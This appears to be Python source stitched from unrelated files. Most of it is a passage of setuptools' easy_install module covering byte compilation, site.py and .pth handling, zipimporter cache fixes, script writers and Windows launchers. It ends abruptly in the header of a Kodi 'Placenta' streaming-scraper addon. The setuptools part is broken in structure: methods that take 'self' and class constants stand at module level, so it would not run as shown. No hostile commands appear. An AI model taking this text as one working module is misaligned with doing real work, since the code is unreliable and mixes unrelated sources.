            chmod(f, mode)
def byte_compile(self, to_compile):
    """Byte-compile the given .py paths, honoring --optimize; skipped
    entirely when bytecode writing is disabled (PYTHONDONTWRITEBYTECODE)."""
    if sys.dont_write_bytecode:
        self.warn('byte-compiling is disabled, skipping.')
        return
    # Local import deliberately shadows this method's name in here.
    from distutils.util import byte_compile
    try:
        # try to make the byte compile messages quieter
        log.set_verbosity(self.verbose - 1)
        byte_compile(to_compile, optimize=0, force=1, dry_run=self.dry_run)
        if self.optimize:
            byte_compile(
                to_compile, optimize=self.optimize, force=1,
                dry_run=self.dry_run
            )
    finally:
        log.set_verbosity(self.verbose)  # restore original verbosity
def no_default_version_msg(self):
    """Explain that the install dir is neither on PYTHONPATH nor a
    .pth-processing directory, with suggested remedies."""
    template = """bad install directory or PYTHONPATH
You are attempting to install a package to a directory that is not
on PYTHONPATH and which Python does not read ".pth" files from. The
installation directory you specified (via --install-dir, --prefix, or
the distutils default setting) was:
%s
and your PYTHONPATH environment variable currently contains:
%r
Here are some of your options for correcting the problem:
* You can choose a different installation directory, i.e., one that is
on PYTHONPATH or supports .pth files
* You can add the installation directory to the PYTHONPATH environment
variable. (It must then also be on PYTHONPATH whenever you run
Python and want to use the package(s) you are installing.)
* You can set up the installation directory to support ".pth" files by
using one of the approaches described here:
https://pythonhosted.org/setuptools/easy_install.html#custom-installation-locations
Please make the appropriate changes for your system and try again."""
    return template % (self.install_dir, os.environ.get('PYTHONPATH', ''))
def install_site_py(self):
    """Make sure there's a site.py in the target dir, if needed"""
    if self.sitepy_installed:
        return  # already did it, or don't need to
    sitepy = os.path.join(self.install_dir, "site.py")
    source = resource_string("setuptools", "site-patch.py")
    current = ""
    if os.path.exists(sitepy):
        log.debug("Checking existing site.py in %s", self.install_dir)
        f = open(sitepy, 'rb')
        current = f.read()
        # we want str, not bytes
        if PY3:
            current = current.decode()
        f.close()
        # Refuse to overwrite a site.py we didn't generate ourselves.
        if not current.startswith('def __boot():'):
            raise DistutilsError(
                "%s is not a setuptools-generated site.py; please"
                " remove it." % sitepy
            )
    if current != source:
        log.info("Creating %s", sitepy)
        if not self.dry_run:
            ensure_directory(sitepy)
            f = open(sitepy, 'wb')
            f.write(source)
            f.close()
        self.byte_compile([sitepy])
    self.sitepy_installed = True
def create_home_path(self):
    """Create directories under ~."""
    if not self.user:
        return
    home = convert_path(os.path.expanduser("~"))
    # Create any missing config-var directories under $HOME.
    missing = (
        p for _k, p in iteritems(self.config_vars)
        if p.startswith(home) and not os.path.isdir(p)
    )
    for path in missing:
        self.debug_print("os.makedirs('%s', 0o700)" % path)
        os.makedirs(path, 0o700)
# Per-platform install-location templates used by _expand() below when
# --prefix is given; '$base' etc. are substituted from config_vars.
INSTALL_SCHEMES = dict(
    posix=dict(
        install_dir='$base/lib/python$py_version_short/site-packages',
        script_dir='$base/bin',
    ),
)

# Fallback scheme for platforms not listed above (i.e. Windows).
DEFAULT_SCHEME = dict(
    install_dir='$base/Lib/site-packages',
    script_dir='$base/Scripts',
)
def _expand(self, *attrs):
    """Substitute $-variables in the named attributes; when --prefix is
    set, default unset dirs from the platform install scheme first."""
    config_vars = self.get_finalized_command('install').config_vars
    if self.prefix:
        # Set default install_dir/scripts from --prefix
        config_vars = config_vars.copy()
        config_vars['base'] = self.prefix
        scheme = self.INSTALL_SCHEMES.get(os.name, self.DEFAULT_SCHEME)
        for attr, val in scheme.items():
            if getattr(self, attr, None) is None:
                setattr(self, attr, val)
    from distutils.util import subst_vars
    for attr in attrs:
        val = getattr(self, attr)
        if val is not None:
            val = subst_vars(val, config_vars)
            if os.name == 'posix':
                val = os.path.expanduser(val)
            setattr(self, attr, val)
def get_site_dirs():
    """Return a list of normalized 'site' dirs: PYTHONPATH entries,
    prefix-derived site-packages dirs, purelib/platlib, and USER_SITE."""
    # return a list of 'site' dirs
    sitedirs = [_f for _f in os.environ.get('PYTHONPATH',
                                            '').split(os.pathsep) if _f]
    prefixes = [sys.prefix]
    if sys.exec_prefix != sys.prefix:
        prefixes.append(sys.exec_prefix)
    for prefix in prefixes:
        if prefix:
            if sys.platform in ('os2emx', 'riscos'):
                sitedirs.append(os.path.join(prefix, "Lib", "site-packages"))
            elif os.sep == '/':
                # POSIX layout: versioned site-packages + site-python.
                sitedirs.extend([os.path.join(prefix,
                                              "lib",
                                              "python" + sys.version[:3],
                                              "site-packages"),
                                 os.path.join(prefix, "lib", "site-python")])
            else:
                # Windows-style layout.
                sitedirs.extend(
                    [prefix, os.path.join(prefix, "lib", "site-packages")]
                )
            if sys.platform == 'darwin':
                # for framework builds *only* we add the standard Apple
                # locations. Currently only per-user, but /Library and
                # /Network/Library could be added too
                if 'Python.framework' in prefix:
                    home = os.environ.get('HOME')
                    if home:
                        sitedirs.append(
                            os.path.join(home,
                                         'Library',
                                         'Python',
                                         sys.version[:3],
                                         'site-packages'))
    lib_paths = get_path('purelib'), get_path('platlib')
    for site_lib in lib_paths:
        if site_lib not in sitedirs:
            sitedirs.append(site_lib)
    if site.ENABLE_USER_SITE:
        sitedirs.append(site.USER_SITE)
    sitedirs = list(map(normalize_path, sitedirs))
    return sitedirs
def expand_paths(inputs):
    """Yield sys.path directories that might contain "old-style" packages"""
    # Yields (dirname, file_list) pairs; also follows directories named
    # by third-party .pth files found in each input dir.
    seen = {}
    for dirname in inputs:
        dirname = normalize_path(dirname)
        if dirname in seen:
            continue
        seen[dirname] = 1
        if not os.path.isdir(dirname):
            continue
        files = os.listdir(dirname)
        yield dirname, files
        for name in files:
            if not name.endswith('.pth'):
                # We only care about the .pth files
                continue
            if name in ('easy-install.pth', 'setuptools.pth'):
                # Ignore .pth files that we control
                continue
            # Read the .pth file
            f = open(os.path.join(dirname, name))
            lines = list(yield_lines(f))
            f.close()
            # Yield existing non-dupe, non-import directory lines from it
            for line in lines:
                if not line.startswith("import"):
                    line = normalize_path(line.rstrip())
                    if line not in seen:
                        seen[line] = 1
                        if not os.path.isdir(line):
                            continue
                        yield line, os.listdir(line)
def extract_wininst_cfg(dist_filename):
    """Extract configuration data from a bdist_wininst .exe

    Returns a ConfigParser.RawConfigParser, or None
    """
    f = open(dist_filename, 'rb')
    try:
        endrec = zipfile._EndRecData(f)
        if endrec is None:
            return None
        # Size of the data prepended before the embedded zip archive
        # (the installer stub + config + bitmap).
        prepended = (endrec[9] - endrec[5]) - endrec[6]
        if prepended < 12:  # no wininst data here
            return None
        f.seek(prepended - 12)
        from setuptools.compat import StringIO, ConfigParser
        import struct
        # Trailer layout: magic tag, config length, bitmap length
        # (three little-endian 32-bit ints).
        tag, cfglen, bmlen = struct.unpack("<iii", f.read(12))
        if tag not in (0x1234567A, 0x1234567B):
            return None  # not a valid tag
        f.seek(prepended - (12 + cfglen))
        cfg = ConfigParser.RawConfigParser(
            {'version': '', 'target_version': ''})
        try:
            part = f.read(cfglen)
            # part is in bytes, but we need to read up to the first null
            # byte.
            if sys.version_info >= (2, 6):
                null_byte = bytes([0])
            else:
                null_byte = chr(0)
            config = part.split(null_byte, 1)[0]
            # Now the config is in bytes, but for RawConfigParser, it should
            # be text, so decode it.
            config = config.decode(sys.getfilesystemencoding())
            cfg.readfp(StringIO(config))
        except ConfigParser.Error:
            return None
        if not cfg.has_section('metadata') or not cfg.has_section('Setup'):
            return None
        return cfg
    finally:
        f.close()
def get_exe_prefixes(exe_filename):
    """Get exe->egg path translations for a given .exe file"""
    prefixes = [
        ('PURELIB/', ''), ('PLATLIB/pywin32_system32', ''),
        ('PLATLIB/', ''),
        ('SCRIPTS/', 'EGG-INFO/scripts/'),
        ('DATA/lib/site-packages', ''),
    ]
    z = zipfile.ZipFile(exe_filename)
    try:
        for info in z.infolist():
            name = info.filename
            parts = name.split('/')
            # A '<pkg>.egg-info/PKG-INFO' entry maps that dir to EGG-INFO/.
            if len(parts) == 3 and parts[2] == 'PKG-INFO':
                if parts[1].endswith('.egg-info'):
                    prefixes.insert(0, ('/'.join(parts[:2]), 'EGG-INFO/'))
                    break
            if len(parts) != 2 or not name.endswith('.pth'):
                continue
            if name.endswith('-nspkg.pth'):
                continue
            if parts[0].upper() in ('PURELIB', 'PLATLIB'):
                contents = z.read(name)
                if PY3:
                    contents = contents.decode()
                # Each non-import line of the .pth names a subdir whose
                # prefix should be stripped during extraction.
                for pth in yield_lines(contents):
                    pth = pth.strip().replace('\\', '/')
                    if not pth.startswith('import'):
                        prefixes.append((('%s/%s/' % (parts[0], pth)), ''))
    finally:
        z.close()
    # Case-insensitive, longest-prefix-first matching order.
    prefixes = [(x.lower(), y) for x, y in prefixes]
    prefixes.sort()
    prefixes.reverse()
    return prefixes
def parse_requirement_arg(spec):
    """Parse a command-line argument as a Requirement, converting parse
    failures into a user-oriented DistutilsError."""
    try:
        return Requirement.parse(spec)
    except ValueError:
        raise DistutilsError(
            "Not a URL, existing file, or requirement spec: %r" % (spec,)
        )
class PthDistributions(Environment):
    """A .pth file with Distribution paths in it"""

    # True when in-memory state differs from the file on disk.
    dirty = False

    def __init__(self, filename, sitedirs=()):
        self.filename = filename
        self.sitedirs = list(map(normalize_path, sitedirs))
        self.basedir = normalize_path(os.path.dirname(self.filename))
        self._load()
        Environment.__init__(self, [], None, None)
        # Register every distribution found on the recorded paths.
        for path in yield_lines(self.paths):
            list(map(self.add, find_distributions(path, True)))

    def _load(self):
        # Read the .pth file, pruning dead, duplicate, and
        # site-dir-shadowed paths as we go.
        self.paths = []
        saw_import = False
        seen = dict.fromkeys(self.sitedirs)
        if os.path.isfile(self.filename):
            f = open(self.filename, 'rt')
            for line in f:
                if line.startswith('import'):
                    saw_import = True
                    continue
                path = line.rstrip()
                self.paths.append(path)
                if not path.strip() or path.strip().startswith('#'):
                    continue
                # skip non-existent paths, in case somebody deleted a package
                # manually, and duplicate paths as well
                path = self.paths[-1] = normalize_path(
                    os.path.join(self.basedir, path)
                )
                if not os.path.exists(path) or path in seen:
                    self.paths.pop()  # skip it
                    self.dirty = True  # we cleaned up, so we're dirty now :)
                    continue
                seen[path] = 1
            f.close()
        if self.paths and not saw_import:
            self.dirty = True  # ensure anything we touch has import wrappers
        # Ignore trailing empty lines.
        while self.paths and not self.paths[-1].strip():
            self.paths.pop()

    def save(self):
        """Write changed .pth file back to disk"""
        if not self.dirty:
            return
        data = '\n'.join(map(self.make_relative, self.paths))
        if data:
            log.debug("Saving %s", self.filename)
            # Wrap the paths in import shims so new entries get spliced
            # into sys.path at sys.__egginsert rather than appended.
            data = (
                "import sys; sys.__plen = len(sys.path)\n"
                "%s\n"
                "import sys; new=sys.path[sys.__plen:];"
                " del sys.path[sys.__plen:];"
                " p=getattr(sys,'__egginsert',0); sys.path[p:p]=new;"
                " sys.__egginsert = p+len(new)\n"
            ) % data
            if os.path.islink(self.filename):
                os.unlink(self.filename)
            f = open(self.filename, 'wt')
            f.write(data)
            f.close()
        elif os.path.exists(self.filename):
            log.debug("Deleting empty %s", self.filename)
            os.unlink(self.filename)
        self.dirty = False

    def add(self, dist):
        """Add `dist` to the distribution map"""
        # Record the location only if it's not already listed and not a
        # site dir (except the cwd, to account for '.' in PYTHONPATH).
        new_path = (
            dist.location not in self.paths and (
                dist.location not in self.sitedirs or
                # account for '.' being in PYTHONPATH
                dist.location == os.getcwd()
            )
        )
        if new_path:
            self.paths.append(dist.location)
            self.dirty = True
        Environment.add(self, dist)

    def remove(self, dist):
        """Remove `dist` from the distribution map"""
        while dist.location in self.paths:
            self.paths.remove(dist.location)
            self.dirty = True
        Environment.remove(self, dist)

    def make_relative(self, path):
        # Return `path` relative to the .pth file's directory, or the
        # original path unchanged if it isn't under that directory.
        npath, last = os.path.split(normalize_path(path))
        baselen = len(self.basedir)
        parts = [last]
        sep = os.altsep == '/' and '/' or os.sep
        while len(npath) >= baselen:
            if npath == self.basedir:
                parts.append(os.curdir)
                parts.reverse()
                return sep.join(parts)
            npath, last = os.path.split(npath)
            parts.append(last)
        else:
            return path
def _first_line_re():
    """
    Return a regular expression based on first_line_re suitable for matching
    strings.
    """
    pattern = first_line_re.pattern
    if isinstance(pattern, str):
        return first_line_re
    # first_line_re in Python >=3.1.4 and >=3.2.1 is a bytes pattern.
    return re.compile(pattern.decode())
def auto_chmod(func, arg, exc):
    """rmtree onerror handler: on Windows, deleting a read-only file
    fails, so make it writable and retry once; otherwise re-raise the
    original exception with the failing call appended for context."""
    # shutil.rmtree reports file-removal failures via os.unlink on
    # CPython (not os.remove), so accept either -- the old
    # `func is os.remove` test meant the retry never actually ran.
    if func in (os.unlink, os.remove) and os.name == 'nt':
        chmod(arg, stat.S_IWRITE)
        return func(arg)
    et, ev, _ = sys.exc_info()
    reraise(et, (ev[0], ev[1] + (" %s %s" % (func, arg))))
def update_dist_caches(dist_path, fix_zipimporter_caches):
    """
    Fix globally cached data related to `dist_path`, the path of a newly
    installed egg distribution (zipped or unzipped).

    Stale ``sys.path_importer_cache`` finders for the original
    distribution are always cleared: the replacement may be packaged
    differently (zipped vs. unzipped folder), and keeping old finders
    cached could make Python load modules with the wrong loader.

    ``zipimport._zip_directory_cache`` holds zip archive directory
    information shared by every ``zipimport.zipimporter`` attached to the
    same archive.  Stale loaders left pointing at the original archive
    can look up data at wrong offsets in the replacement — failing with
    errors such as 'bad local file header', or worse, silently returning
    invalid data.

    When `fix_zipimporter_caches` is true (and the Python implementation
    allows it), the shared cached directory information is updated in
    place, fixing all existing zipimporter instances at once — this
    assumes the replacement distribution is a zipped egg.  Otherwise the
    stale entries are cleared and removed so neither existing nor newly
    constructed zipimporters reuse outdated directory information.

    Other known holders of stale zipimporter references are deliberately
    left alone (the global pkg_resources working set, loaders held in
    local variables up the call stack, and modules' ``__loader__``
    attributes — the latter documented as introspection-only).  Any
    remaining caches should be maintained by whoever owns them.
    """
    normalized_path = normalize_path(dist_path)
    _uncache(normalized_path, sys.path_importer_cache)
    if fix_zipimporter_caches:
        _replace_zip_directory_cache_data(normalized_path)
    else:
        # Two phases: (1) clear each stale entry so existing zipimporter
        # instances fail fast instead of reading bad data, then
        # (2) remove it so new zipimporter instances do not reuse it.
        # Possibly not strictly necessary, but kept for safety — there
        # are no unit tests proving it redundant.
        _remove_and_clear_zip_directory_cache_data(normalized_path)
def _collect_zipimporter_cache_entries(normalized_path, cache):
    """
    Return the keys in `cache` referring to `normalized_path` itself or
    any sub-path of it (zip archives embedded in other zip archives),
    regardless of spelling (character case, alternative separators).
    """
    prefix_len = len(normalized_path)
    matches = []
    for key in cache:
        candidate = normalize_path(key)
        # Accept an exact match, or a path continuing past a separator.
        if (candidate.startswith(normalized_path)
                and candidate[prefix_len:prefix_len + 1] in (os.sep, '')):
            matches.append(key)
    return matches
def _update_zipimporter_cache(normalized_path, cache, updater=None):
    """
    Remove (and optionally replace) zipimporter cache entries related to
    `normalized_path`, including sub-path entries for embedded archives.

    `updater`, when given, is called with (key, old_entry) after the
    entry has already been removed from the cache; a non-None return
    value is re-inserted under the same key.  With no updater, matching
    entries are simply dropped.
    """
    for key in _collect_zipimporter_cache_entries(normalized_path, cache):
        # N.B. PyPy's custom zipimport._zip_directory_cache is not a full
        # dict: it lacks dict.pop() and item assignment, forcing the
        # get/del access pattern used here.  See:
        # https://bitbucket.org/pypa/setuptools/issue/202/more-robust-zipimporter-cache-invalidation#comment-10495960
        # https://bitbucket.org/pypy/pypy/src/dd07756a34a41f674c0cacfbc8ae1d4cc9ea2ae4/pypy/module/zipimport/interp_zipimport.py#cl-99
        old_entry = cache[key]
        del cache[key]
        replacement = updater(key, old_entry) if updater else None
        if replacement is not None:
            cache[key] = replacement
def _uncache(normalized_path, cache):
    """Drop every cache entry related to `normalized_path`."""
    _update_zipimporter_cache(normalized_path, cache)
def _remove_and_clear_zip_directory_cache_data(normalized_path):
    """Clear and drop zip directory cache entries for `normalized_path`."""
    def _clear_entry(path, old_entry):
        # Empty the shared dict (stale zipimporters then fail fast) and
        # return None so the entry is not re-inserted.
        old_entry.clear()

    _update_zipimporter_cache(
        normalized_path, zipimport._zip_directory_cache,
        updater=_clear_entry)
# PyPy does not allow writing directly to zipimport._zip_directory_cache,
# so the best we can do there is clear the problematic cache content and
# let PyPy repopulate it on demand.  Downside: stale zipimport.zipimporter
# instances will then fail (their directory information is gone) instead
# of being transparently redirected to the new archive's directory data.
if '__pypy__' in sys.builtin_module_names:
    _replace_zip_directory_cache_data = \
        _remove_and_clear_zip_directory_cache_data
else:
    def _replace_zip_directory_cache_data(normalized_path):
        def replace_cached_zip_archive_directory_data(path, old_entry):
            # Reload the directory info via a fresh zipimporter and copy
            # it into the existing shared dict so every zipimporter
            # referencing that dict sees the update.  (Loading once and
            # patching path spellings would be too invasive: the cache
            # layout is undocumented and may change between releases.)
            old_entry.clear()
            zipimport.zipimporter(path)
            old_entry.update(zipimport._zip_directory_cache[path])
            return old_entry

        _update_zipimporter_cache(
            normalized_path, zipimport._zip_directory_cache,
            updater=replace_cached_zip_archive_directory_data)
def is_python(text, filename='<string>'):
    """Return True if `text` compiles as a valid Python script."""
    try:
        compile(text, filename, 'exec')
    except (SyntaxError, TypeError):
        return False
    return True
def is_sh(executable):
    """Determine if the specified executable is a .sh (contains a #! line)"""
    try:
        with open(executable) as fp:
            magic = fp.read(2)
    except (OSError, IOError):
        # Unreadable: fall back to returning the (truthy) path itself,
        # preserving the historical behavior callers rely on.
        return executable
    return magic == '#!'
def nt_quote_arg(arg):
    """Quote a single command line argument per Windows parsing rules."""
    return subprocess.list2cmdline([arg])
def is_python_script(script_text, filename):
    """Is this text, as a whole, a Python script? (as opposed to
    shell/bat/etc.)"""
    if filename.endswith(('.py', '.pyw')):
        return True  # extension says it's Python
    if is_python(script_text, filename):
        return True  # syntactically valid Python
    if script_text.startswith('#!'):
        # Shebang present: Python if 'python' appears on that first line.
        return 'python' in script_text.splitlines()[0].lower()
    return False  # Not any Python I can recognize
try:
    from os import chmod as _chmod
except ImportError:
    # Jython compatibility: no os.chmod, substitute a no-op.
    def _chmod(*args):
        pass


def chmod(path, mode):
    """Best-effort chmod: failures are logged at debug level, never raised."""
    log.debug("changing mode of %s to %o", path, mode)
    try:
        _chmod(path, mode)
    except os.error as e:
        log.debug("chmod failed: %s", e)
def fix_jython_executable(executable, options):
    """Return a shebang-safe interpreter path for Jython; pass the value
    through unchanged on other platforms."""
    if not (sys.platform.startswith('java') and is_sh(executable)):
        return executable
    # The workaround for Jython is not needed on Linux systems.
    import java
    if java.lang.System.getProperty("os.name") == "Linux":
        return executable
    if options:
        # '/usr/bin/env' cannot carry interpreter options, so the
        # workaround cannot apply; leave the script broken and warn.
        log.warn(
            "WARNING: Unable to adapt shebang line for Jython,"
            " the following script is NOT executable\n"
            " see http://bugs.jython.org/issue1112 for"
            " more information.")
        return executable
    # Work around Jython's sys.executable being a .sh script (an invalid
    # shebang line interpreter) by routing through env.
    return '/usr/bin/env %s' % executable
class CommandSpec(list):
    """
    A command spec for a #! header, specified as a list of arguments akin
    to those passed to Popen.
    """

    options = []

    @classmethod
    def _sys_executable(cls):
        # Honor the OS X venv launcher override when present.
        fallback = os.path.normpath(sys.executable)
        return os.environ.get('__PYVENV_LAUNCHER__', fallback)

    @classmethod
    def from_param(cls, param):
        """
        Construct a CommandSpec from a parameter to build_scripts, which
        may be None, a string, a list, or an existing CommandSpec.
        """
        if isinstance(param, cls):
            return param
        if isinstance(param, list):
            return cls(param)
        if param is None:
            return cls.from_environment()
        # otherwise, assume it's a string.
        return cls.from_string(param)

    @classmethod
    def from_environment(cls):
        return cls.from_string('"' + cls._sys_executable() + '"')

    @classmethod
    def from_string(cls, string):
        """
        Construct a command spec from a simple string representing a
        command line parseable by shlex.split.
        """
        items = shlex.split(string)
        # Jython gets its own spec class when its workaround applies.
        return JythonCommandSpec.from_string(string) or cls(items)

    def install_options(self, script_text):
        """Capture interpreter options from the script's #! line; force
        '-x' when the rendered command line is not pure ASCII."""
        self.options = shlex.split(self._extract_options(script_text))
        rendered = subprocess.list2cmdline(self)
        if not isascii(rendered):
            self.options[:0] = ['-x']

    @staticmethod
    def _extract_options(orig_script):
        """
        Extract any interpreter options from the first line of the script.
        """
        first_line = (orig_script + '\n').splitlines()[0]
        match = _first_line_re().match(first_line)
        options = match.group(1) or '' if match else ''
        return options.strip()

    def as_header(self):
        return self._render(self + list(self.options))

    @staticmethod
    def _render(items):
        return '#!' + subprocess.list2cmdline(items) + '\n'
# For pbr compat; module-level alias of the interpreter path used for
# script headers.  Will be removed in a future version.
sys_executable = CommandSpec._sys_executable()
class JythonCommandSpec(CommandSpec):
    @classmethod
    def from_string(cls, string):
        """
        On Jython (outside Linux), wrap `string` in an instance of this
        class.  On every other platform, return None.
        """
        # Only touch java.lang.System when actually running on Jython.
        needs_jython_spec = (
            sys.platform.startswith('java')
            and
            __import__('java').lang.System.getProperty('os.name') != 'Linux'
        )
        return cls([string]) if needs_jython_spec else None

    def as_header(self):
        """
        Workaround Jython's sys.executable being a .sh (an invalid
        shebang line interpreter): route through /usr/bin/env.
        """
        if not is_sh(self[0]):
            return super(JythonCommandSpec, self).as_header()
        if self.options:
            # env cannot carry interpreter options; leave it broken.
            log.warn(
                "WARNING: Unable to adapt shebang line for Jython,"
                " the following script is NOT executable\n"
                " see http://bugs.jython.org/issue1112 for"
                " more information.")
            return super(JythonCommandSpec, self).as_header()
        return self._render(['/usr/bin/env'] + self + list(self.options))
class ScriptWriter(object):
    """
    Encapsulates behavior around writing entry point scripts for console
    and gui apps.
    """

    template = textwrap.dedent("""
        # EASY-INSTALL-ENTRY-SCRIPT: %(spec)r,%(group)r,%(name)r
        __requires__ = %(spec)r
        import sys
        from pkg_resources import load_entry_point

        if __name__ == '__main__':
            sys.exit(
                load_entry_point(%(spec)r, %(group)r, %(name)r)()
            )
    """).lstrip()

    @classmethod
    def get_script_args(cls, dist, executable=None, wininst=False):
        # for backward compatibility
        warnings.warn("Use get_args", DeprecationWarning)
        writer = (WindowsScriptWriter if wininst else ScriptWriter).best()
        header = cls.get_script_header("", executable, wininst)
        return writer.get_args(dist, header)

    @classmethod
    def get_script_header(cls, script_text, executable=None, wininst=False):
        # for backward compatibility
        warnings.warn("Use get_header", DeprecationWarning)
        if wininst:
            executable = "python.exe"
        cmd = CommandSpec.from_param(executable)
        cmd.install_options(script_text)
        return cmd.as_header()

    @classmethod
    def get_args(cls, dist, header=None):
        """
        Yield write_script() argument tuples for a distribution's
        entrypoints
        """
        if header is None:
            header = cls.get_header()
        spec = str(dist.as_requirement())
        for type_ in 'console', 'gui':
            group = type_ + '_scripts'
            for name, ep in dist.get_entry_map(group).items():
                # template keys (spec/group/name) come from locals().
                script_text = cls.template % locals()
                args = cls._get_script_args(type_, name, header, script_text)
                for res in args:
                    yield res

    @classmethod
    def get_writer(cls, force_windows):
        # for backward compatibility
        warnings.warn("Use best", DeprecationWarning)
        return WindowsScriptWriter.best() if force_windows else cls.best()

    @classmethod
    def best(cls):
        """
        Select the best ScriptWriter for this environment.
        """
        return WindowsScriptWriter.best() if sys.platform == 'win32' else cls

    @classmethod
    def _get_script_args(cls, type_, name, header, script_text):
        # Simply write the stub with no extension.
        yield (name, header + script_text)

    @classmethod
    def get_header(cls, script_text="", executable=None):
        """Create a #! line, getting options (if any) from script_text"""
        cmd = CommandSpec.from_param(executable)
        cmd.install_options(script_text)
        return cmd.as_header()
class WindowsScriptWriter(ScriptWriter):
    @classmethod
    def get_writer(cls):
        # for backward compatibility
        warnings.warn("Use best", DeprecationWarning)
        return cls.best()

    @classmethod
    def best(cls):
        """
        Select the best ScriptWriter suitable for Windows, honoring the
        SETUPTOOLS_LAUNCHER environment variable.
        """
        writer_lookup = dict(
            executable=WindowsExecutableLauncherWriter,
            natural=cls,
        )
        # for compatibility, use the executable launcher by default
        launcher = os.environ.get('SETUPTOOLS_LAUNCHER', 'executable')
        return writer_lookup[launcher]

    @classmethod
    def _get_script_args(cls, type_, name, header, script_text):
        "For Windows, add a .py extension"
        # NOTE(review): '.pya' matches the historical value here; confirm
        # it is intentional before changing it to '.py'.
        ext = dict(console='.pya', gui='.pyw')[type_]
        if ext not in os.environ['PATHEXT'].lower().split(';'):
            warnings.warn("%s not listed in PATHEXT; scripts will not be "
                          "recognized as executables." % ext, UserWarning)
        stale_exts = ['.pya', '.py', '-script.py', '.pyc', '.pyo', '.pyw', '.exe']
        stale_exts.remove(ext)
        header = cls._adjust_header(type_, header)
        blockers = [name + x for x in stale_exts]
        yield name + ext, header + script_text, 't', blockers

    @staticmethod
    def _adjust_header(type_, orig_header):
        """
        Make sure 'pythonw' is used for gui and 'python' is used for
        console (regardless of what sys.executable is).
        """
        pattern = 'pythonw.exe'
        repl = 'python.exe'
        if type_ == 'gui':
            pattern, repl = repl, pattern
        pattern_ob = re.compile(re.escape(pattern), re.IGNORECASE)
        new_header = pattern_ob.sub(string=orig_header, repl=repl)
        # Strip '#!' and the trailing newline/quotes to get a plain path.
        clean_header = new_header[2:-1].strip('"')
        if sys.platform == 'win32' and not os.path.exists(clean_header):
            # the adjusted version doesn't exist, so return the original
            return orig_header
        return new_header
class WindowsExecutableLauncherWriter(WindowsScriptWriter):
    @classmethod
    def _get_script_args(cls, type_, name, header, script_text):
        """
        For Windows, add a .py extension and an .exe launcher
        """
        if type_ == 'gui':
            launcher_type = 'gui'
            ext = '-script.pyw'
            stale_exts = ['.pyw']
        else:
            launcher_type = 'cli'
            ext = '-script.py'
            stale_exts = ['.py', '.pyc', '.pyo']
        hdr = cls._adjust_header(type_, header)
        blockers = [name + x for x in stale_exts]
        yield (name + ext, hdr + script_text, 't', blockers)
        yield (
            name + '.exe', get_win_launcher(launcher_type),
            'b'  # write in binary mode
        )
        if not is_64bit():
            # install a manifest for the launcher to prevent Windows
            # from detecting it as an installer (which it will for
            # launchers like easy_install.exe). Consider only
            # adding a manifest for launchers detected as installers.
            # See Distribute #143 for details.
            m_name = name + '.exe.manifest'
            yield (m_name, load_launcher_manifest(name), 't')
# for backward-compatibility: module-level aliases kept so external code
# that imported these functions directly continues to work.
get_script_args = ScriptWriter.get_script_args
get_script_header = ScriptWriter.get_script_header
def get_win_launcher(type):
    """
    Load the Windows launcher (executable) suitable for launching a
    script.

    `type` should be either 'cli' or 'gui'

    Returns the executable as a byte string.
    """
    launcher_fn = '%s.exe' % type
    # Select the architecture-specific launcher resource.
    if platform.machine().lower() == 'arm':
        launcher_fn = launcher_fn.replace(".", "-arm.")
    suffix = "-64." if is_64bit() else "-32."
    launcher_fn = launcher_fn.replace(".", suffix)
    return resource_string('setuptools', launcher_fn)
def load_launcher_manifest(name):
    """Render the launcher .exe manifest, substituting the script name."""
    manifest = pkg_resources.resource_string(__name__, 'launcher manifest.xml')
    # vars() supplies %(name)s for the template substitution.
    if PY2:
        return manifest % vars()
    return manifest.decode('utf-8') % vars()
def rmtree(path, ignore_errors=False, onerror=auto_chmod):
    """Recursively delete a directory tree.

    This code is taken from the Python 2.4 version of 'shutil', because
    the 2.3 version doesn't really work right.
    """
    if ignore_errors:
        def onerror(*args):
            pass
    elif onerror is None:
        def onerror(*args):
            raise

    entries = []
    try:
        entries = os.listdir(path)
    except os.error:
        onerror(os.listdir, path, sys.exc_info())

    for entry in entries:
        fullname = os.path.join(path, entry)
        try:
            mode = os.lstat(fullname).st_mode
        except os.error:
            mode = 0
        if stat.S_ISDIR(mode):
            rmtree(fullname, ignore_errors, onerror)
        else:
            try:
                os.remove(fullname)
            except os.error:
                onerror(os.remove, fullname, sys.exc_info())

    try:
        os.rmdir(path)
    except os.error:
        onerror(os.rmdir, path, sys.exc_info())
def current_umask():
    """Return the process umask without permanently changing it."""
    mask = os.umask(0o022)
    os.umask(mask)
    return mask
def bootstrap():
    """Entry point used when a setuptools*.egg is executed via /bin/sh:
    rewrite argv to point at the egg and hand off to main()."""
    import setuptools
    argv0 = os.path.dirname(setuptools.__path__[0])
    sys.argv[0] = argv0
    sys.argv.append(argv0)
    main()
def main(argv=None, **kw):
    """Run easy_install as a standalone command."""
    from setuptools import setup
    from setuptools.dist import Distribution

    class DistributionWithoutHelpCommands(Distribution):
        common_usage = ""

        def _show_help(self, *args, **kw):
            with _patch_usage():
                Distribution._show_help(self, *args, **kw)

    if argv is None:
        argv = sys.argv[1:]

    with _patch_usage():
        setup(
            script_args=['-q', 'easy_install', '-v'] + argv,
            script_name=sys.argv[0] or 'easy_install',
            distclass=DistributionWithoutHelpCommands,
            **kw
        )
@contextlib.contextmanager
def _patch_usage():
    """Temporarily replace distutils' usage text with easy_install's own,
    restoring the original on exit."""
    import distutils.core

    USAGE = textwrap.dedent("""
        usage: %(script)s [options] requirement_or_url ...
           or: %(script)s --help
        """).lstrip()

    def gen_usage(script_name):
        return USAGE % dict(script=os.path.basename(script_name))

    saved = distutils.core.gen_usage
    distutils.core.gen_usage = gen_usage
    try:
        yield
    finally:
        distutils.core.gen_usage = saved
# -*- coding: UTF-8 -*-
#######################################################################
# ----------------------------------------------------------------------------
# "THE BEER-WARE LICENSE" (Revision 42):
# @tantrumdev wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a beer in return. - Muad'Dib
# ----------------------------------------------------------------------------
#######################################################################
# Addon Name: Placenta
# Addon id: plugin.video.placenta
# Addon Provider: Mr.Blamo
import re,traceback,urllib,urlparse,json,base64,time

from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import dom_parser2
from resources.lib.modules import log_utils
class source:
    """Scraper source for 123movieser.com (Python 2 / Kodi addon API)."""

    def __init__(self):
        self.priority = 1
        self.language = ['en']
        self.domains = ['movieshd.tv', 'movieshd.is', 'movieshd.watch', 'flixanity.is', 'flixanity.me','istream.is','flixanity.online','flixanity.cc','123movies.it']
        self.base_link = 'http://123movieser.com'
